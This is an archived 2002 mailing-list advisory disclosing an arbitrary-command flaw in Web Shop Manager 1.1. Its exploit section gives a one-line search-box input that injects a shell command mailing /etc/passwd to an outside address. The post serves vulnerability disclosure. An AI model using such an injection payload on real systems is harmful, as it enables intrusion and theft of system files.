|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Tacettin Karadeniz (tacettinkaradeniz_at_yahoo.com)
Date: Thu Aug 15 2002 - 05:15:37 CDT
Summary
The Web Shop
Manager(http://www.webscriptworld.com/scripts/wsm.phtml)
allows you to manage a fully functional online store
from a centralized web-based administration system. A
security vulnerability in the product allows executing
of arbitrary commands with the privileges of the
script file used by the product.
Details
Vulnerable systems:
* Web Shop Manager version 1.1
Exploit:
It is possible to send server's password file any mail
address by writing the following command in Web Shop
Manager's search box:
|mail user
host.com < /etc/passwd
__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]